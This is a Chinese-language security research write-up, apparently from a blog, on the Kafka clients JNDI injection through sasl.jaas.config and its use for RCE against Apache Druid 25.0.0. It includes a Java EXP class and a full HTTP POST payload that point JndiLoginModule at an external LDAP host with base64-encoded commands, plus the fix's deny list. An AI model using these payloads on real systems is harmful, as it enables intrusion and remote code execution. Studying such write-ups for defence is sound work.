网站栏目结构图,做网站时需要FTP工具吗,公司网站首页设计构想,网站开发流程图和介绍Apache Kafka Clients Jndi Injection 漏洞描述 Apache Kafka 是一个分布式数据流处理平台#xff0c;可以实时发布、订阅、存储和处理数据流。Kafka Connect 是一种用于在 kafka 和其他系统之间可扩展、可靠的流式传输数据的工具。攻击者可以利用基于 SASL JAAS 配置和 SASL … Apache Kafka Clients Jndi Injection 漏洞描述 Apache Kafka 是一个分布式数据流处理平台可以实时发布、订阅、存储和处理数据流。Kafka Connect 是一种用于在 kafka 和其他系统之间可扩展、可靠的流式传输数据的工具。攻击者可以利用基于 SASL JAAS 配置和 SASL 协议的任意 Kafka 客户端对 Kafka Connect worker 创建或修改连接器时通过构造特殊的配置进行 JNDI 注入来实现远程代码执行。 影响范围 2.4.0 Apache Kafka 3.3.2 前置知识 Kafka 是什么 Kafka 是一个开源的分布式消息系统Kafka 可以处理大量的消息和数据流具有高吞吐量、低延迟、可扩展性等特点。它被广泛应用于大数据领域如日志收集、数据传输、流处理等场景。 感觉上和 RocketMQ 很类似主要功能都是用来进行数据传输的。 Kafka 客户端 SASL JAAS 配置 简单认证与安全层 (SASL, Simple Authentication and Security Layer ) 是一个在网络协议中用来认证和数据加密的构架在 Kafka 的实际应用当中表现为 JAAS。 Java 认证和授权服务Java Authentication and Authorization Service简称 JAAS是一个 Java 以用户为中心的安全框架作为 Java 以代码为中心的安全的补充。总结一下就是用于认证。有趣的是 Shiro (JSecurity) 最初被开发出来的原因就是由于当时 JAAS 存在着许多缺点 参考自 https://blog.csdn.net/yinxuep/article/details/103242969 还有一些细微的配置这里不再展开。动态设置和静态修改 .conf 文件实际上效果是一致的。 服务端配置 1、通常在服务器节点下配置服务器 JASS 文件例如这里我们将其命名为 kafka_server_jaas.conf内容如下 KafkaServer {org.apache.kafka.common.security.plain.PlainLoginModule requiredusernameeystarpasswordeystar8888user_eystareystar8888user_yxpyxp-secret;
}; 说明 username password 表示 kafka 集群环境各个代理之间进行通信时使用的身份验证信息。 user_eystareystar8888 表示定义客户端连接到代理的用户信息即创建一个用户名为 eystar密码为 eystar8888 的用户身份信息kafka 代理对其进行身份验证可以创建多个用户格式 user_XXX”XXX” 2、如果处于静态使用中需要将其加入到 JVM 启动参数中如下 if [ x$KAFKA_OPTS ]; thenexport KAFKA_OPTS-Djava.security.auth.login.config/opt/modules/kafka_2.11-2.0.0/config/kafka_server_jaas.conffi https://kafka.apache.org/documentation/#brokerconfigs_sasl.jaas.config 客户端配置 基本同服务端一致如下步骤 1、配置客户端 JAAS 文件命名为 kafka_client_jaas.conf KafkaClient {org.apache.kafka.common.security.plain.PlainLoginModule requiredusernameeystarpasswordeystar8888;
}; 2、JAVA 调用的 Kafka Client 客户端连接时指定配置属性 sasl.jaas.config sasl.jaas.configorg.apache.kafka.common.security.plain.PlainLoginModule required \usernameeystar \
passwordeystar8888;
// 即配置属性后续会讲到也能够动态配置让我想起了 RocketMQ
Pro.set(“sasl.jaas.config”,”org.apache.kafka.common.security.plain.PlainLoginModule required username\eystar\ password\eystar8888\;;
”); Kafka 客户端动态修改 JAAS 配置 方式一配置 Properties 属性可以注意到这一个字段的键名为 sasl.jaas.config它的格式如下 loginModuleClass controlFlag (optionNameoptionValue)*; 其中的 loginModuleClass 代表认证方式, 例如 LDAP, Kerberos, Unix 认证可以参考官方文档 https://docs.oracle.com/javase/8/docs/technotes/guides/security/jgss/tutorials/LoginConfigFile.html 其中有一处为 JndiLoginModuleJDK 自带的 loginModule 位于 com.sun.security.auth.module //安全模式 用户名 密码
props.setProperty(sasl.jaas.config, org.apache.kafka.common.security.plain.PlainLoginModule required username\usn\ password\pwd\;);
props.setProperty(security.protocol, SASL_PLAINTEXT);
props.setProperty(sasl.mechanism, PLAIN); 方式二设置系统属性参数 // 指定kafka_client_jaas.conf文件路径
String confPath TestKafkaComsumer.class.getResource(/).getPath() /kafka_client_jaas.conf;
System.setProperty(java.security.auth.login.config, confPath); 实现代码 消费者 public class TestComsumer {public static void main(String[] args) {Properties props new Properties();props.put(bootstrap.servers, 192.168.1.176:9092);props.put(group.id, test_group);props.put(enable.auto.commit, true);props.put(auto.commit.interval.ms, 1000);props.put(key.deserializer,org.apache.kafka.common.serialization.StringDeserializer);props.put(value.deserializer,org.apache.kafka.common.serialization.StringDeserializer);// sasl.jaas.config的配置props.setProperty(sasl.jaas.config, org.apache.kafka.common.security.plain.PlainLoginModule required username\usn\ password\pwd\;);props.setProperty(security.protocol, SASL_PLAINTEXT);props.setProperty(sasl.mechanism, PLAIN);KafkaConsumerString, String consumer new KafkaConsumer(props);consumer.subscribe(Arrays.asList(topic_name));while (true) {try {ConsumerRecordsString, String records consumer.poll(Duration.ofMillis(100));for (ConsumerRecordString, String record : records)System.out.printf(offset %d, partition %d, key %s, value %s%n,record.offset(), record.partition(), record.key(), record.value());} catch (Exception e) {e.printStackTrace();}}}} 生产者 public class TestProduce {public static void main(String args[]) {Properties props new Properties();props.put(bootstrap.servers, 192.168.1.176:9092);props.put(acks, 1);props.put(retries, 3);props.put(batch.size, 16384);props.put(buffer.memory, 33554432);props.put(linger.ms, 10);props.put(key.serializer,org.apache.kafka.common.serialization.StringSerializer);props.put(value.serializer,org.apache.kafka.common.serialization.StringSerializer);//saslprops.setProperty(sasl.jaas.config, org.apache.kafka.common.security.plain.PlainLoginModule required username\usn\ password\pwd\;);props.setProperty(security.protocol, SASL_PLAINTEXT);props.setProperty(sasl.mechanism, PLAIN);ProducerString, String producer new KafkaProducer(props);/*** ProducerRecord 参数解析 第一个topic_name为生产者 topic名称,* 第二个对于生产者kafka2.0需要你指定一个key* ,在企业应用中我们一般会把他当做businessId来用比如订单ID,用户ID等等。 第三个消息的主要信息*/try {producer.send(new ProducerRecordString, String(topic_name, Integer.toString(i), message info));} catch (InterruptedException e) {e.printStackTrace();}}} 漏洞复现 漏洞触发点其实是在 com.sun.security.auth.module.JndiLoginModule#attemptAuthentication 方法处 lookup.png 理顺逻辑很容易构造出 EXP import org.apache.kafka.clients.consumer.KafkaConsumer;
import org.apache.kafka.clients.producer.KafkaProducer;import java.util.Properties;public class EXP {public static void main(String[] args) throws Exception {Properties properties new Properties();properties.put(bootstrap.servers, 127.0.0.1:1234);properties.put(key.deserializer, org.apache.kafka.common.serialization.StringDeserializer);properties.put(value.deserializer,org.apache.kafka.common.serialization.StringDeserializer);properties.put(sasl.mechanism, PLAIN);properties.put(security.protocol, SASL_SSL);properties.put(sasl.jaas.config, com.sun.security.auth.module.JndiLoginModule required user.provider.url\ldap://124.222.21.138:1389/Basic/Command/Base64/Q2FsYw\ useFirstPass\true\ group.provider.url\xxx\;);KafkaConsumerString, String kafkaConsumer new KafkaConsumer(properties);kafkaConsumer.close();}
} 漏洞分析 前面有非常多的数据处理与赋值这里就跳过了直接看 org.apache.kafka.clients.consumer.KafkaConsumer 类的第 177 行 ClientUtils.createChannelBuilder()跟进。 继续跟进这里会先判断 SASL 模式是否开启只有开启了才会往下跟进到 create() 方法 SASL_SSL.png 跟进 create() 方法做完客户端的判断和安全协议的判断之后调用了 loadClientContext() 方法跟进发现其中还是加载了一些配置。 跳出来跟进 ((ChannelBuilder)channelBuilder).configure(configs) 方法最后跟到 org.apache.kafka.common.security.authenticator.LoginManager 的构造函数。 LoginManager.png 跟进 login() 方法此处 new LoginContext()随后调用 login() 方法跟进 这里会调用 JndiLoginModule 的 initialize() 方法 初始化完成之后此处调用 JndiLoginModule 的 login() 方法最后到 JndiLoginModule 的 attemptAuthentication() 方法完成 Jndi 注入。 漏洞修复 在 3.4.0 版本中, 官方的修复方式是增加了对 JndiLoginModule 的黑名单 org.apache.kafka.common.security.JaasContext#throwIfLoginModuleIsNotAllowed private static void throwIfLoginModuleIsNotAllowed(AppConfigurationEntry appConfigurationEntry) {SetString disallowedLoginModuleList (Set)Arrays.stream(System.getProperty(org.apache.kafka.disallowed.login.modules, com.sun.security.auth.module.JndiLoginModule).split(,)).map(String::trim).collect(Collectors.toSet());String loginModuleName appConfigurationEntry.getLoginModuleName().trim();if (disallowedLoginModuleList.contains(loginModuleName)) {throw new IllegalArgumentException(loginModuleName is not allowed. Update System property org.apache.kafka.disallowed.login.modules to allow loginModuleName);}
} Apache Druid RCE via Kafka Clients 影响版本Apache Druid 25.0.0 Apache Druid 是一个实时分析型数据库, 它支持从 Kafka 中导入数据 (Consumer) , 因为目前最新版本的 Apache Druid 25.0.0 所用 kafka-clients 依赖的版本仍然是 3.3.1, 即存在漏洞的版本, 所以如果目标 Druid 存在未授权访问 (默认配置无身份认证), 则可以通过这种方式实现 RCE 有意思的是, Druid 包含了 commons-beanutils:1.9.4 依赖, 所以即使在高版本 JDK 的情况下也能通过 LDAP JNDI 打反序列化 payload 实现 RCE • 漏洞 UI 处触发点Druid Web Console - Load data - Apache Kafka 在这里可以加载 Kafka 的 Data其中可以修改配置项 sasl.jaas.config由此构造 Payload POST http://124.222.21.138:8888/druid/indexer/v1/sampler?forconnect HTTP/1.1
Host: 124.222.21.138:8888
Content-Length: 916
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.43
Content-Type: application/json
Origin: http://124.222.21.138:8888
Referer: http://124.222.21.138:8888/unified-console.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9,en;q0.8,en-GB;q0.7,en-US;q0.6,ja;q0.5,zh-TW;q0.4,no;q0.3,ko;q0.2
Connection: close{type:kafka,spec:{type:kafka,ioConfig:{type:kafka,consumerProperties:{bootstrap.servers:127.0.0.1:1234,
sasl.mechanism:SCRAM-SHA-256,security.protocol:SASL_SSL,sasl.jaas.config:com.sun.security.auth.module.JndiLoginModule required user.provider.url\ldap://124.222.21.138:1389/Basic/Command/base64/aWQgPiAvdG1wL3N1Y2Nlc3M\ useFirstPass\true\ serviceName\x\ debug\true\ group.provider.url\xxx\;
},topic:123,useEarliestOffset:true,inputFormat:{type:regex,pattern:([\\s\\S]*),listDelimiter:56616469-6de2-9da4-efb8-8f416e6e6965,columns:[raw]}},dataSchema:{dataSource:sample,timestampSpec:{column:!!!_no_such_column_!!!,missingValue:1970-01-01T00:00:00Z},dimensionsSpec:{},granularitySpec:{rollup:false}},tuningConfig:{type:kafka}},samplerConfig:{numRows:500,timeoutMs:15000}} 在 druid-kafka-indexing-service 这个 extension 中可以看到实例化 KafkaConsumer 的过程 而上面第 286 行的 addConsumerPropertiesFromConfig() 正是进行了动态修改配置 Apache Druid 26.0.0 更新了 kafka 依赖的版本 https://github.com/apache/druid/blob/26.0.0/pom.xml#L79 原创稿件征集 征集原创技术文章中欢迎投递 投稿邮箱eduantvsion.com 文章类型黑客极客技术、信息安全热点安全研究分析等安全相关 通过审核并发布能收获200-800元不等的稿酬。 更多详情点我查看 参与11.11狂欢戳“阅读原文”